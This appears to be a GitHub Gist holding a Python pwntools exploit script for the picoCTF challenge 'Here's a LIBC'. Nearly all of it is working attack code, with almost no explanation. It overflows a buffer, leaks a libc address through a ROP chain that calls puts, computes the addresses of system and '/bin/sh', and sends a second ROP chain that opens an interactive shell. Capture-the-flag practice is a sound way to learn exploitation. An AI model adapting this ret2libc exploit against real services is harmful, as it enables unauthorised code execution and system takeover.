Skip to content

Instantly share code, notes, and snippets.

@auser
Created Jun 13, 2021
Embed
What would you like to do?
picoCTF Here's a LIBC
#!/usr/bin/env python3
from pwn import gdb, log, p64, process, remote, u64
p = process('./vuln')
# p = remote('mercury.picoctf.net', 49464)
gdb.attach(p)
offset = 136
junk = b'A' * offset
pop_rdi = 0x0000000000400913
setbuf_in_got_plt = 0x00601028
puts_in_plt = 0x400540
back_to_main_fn = 0x400771
payload = [
junk,
p64(pop_rdi),
p64(setbuf_in_got_plt),
p64(puts_in_plt),
p64(back_to_main_fn)
]
payload = b''.join(payload)
p.sendline(payload)
p.recvline()
p.recvline()
leak = p.recvline().strip()
leak = u64(leak.ljust(8, b'\x00'))
log.info(f"leaked: {hex(leak)=}")
# readelf -s ./libc.so.6 | grep setbuf
setbuf_offset = 0x088540
base_address_of_libc = leak - setbuf_offset
log.info(f"base address of libc: {hex(base_address_of_libc)=}")
# readelf -s ./libc.so.6 | grep system
system_addr_offset = 0x4f4e0
system_address = base_address_of_libc + system_addr_offset
log.info(f"system address in libc: {hex(system_address)=}")
bin_sh_offset = 0x1b40fa
bin_sh_address = base_address_of_libc + bin_sh_offset
ret_instruction = 0x40052e
second_payload = [
# So we can get rdi
junk,
p64(pop_rdi),
# /bin/sh with system
p64(bin_sh_address),
p64(ret_instruction),
p64(system_address),
]
second_payload = b''.join(second_payload)
p.sendline(second_payload)
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment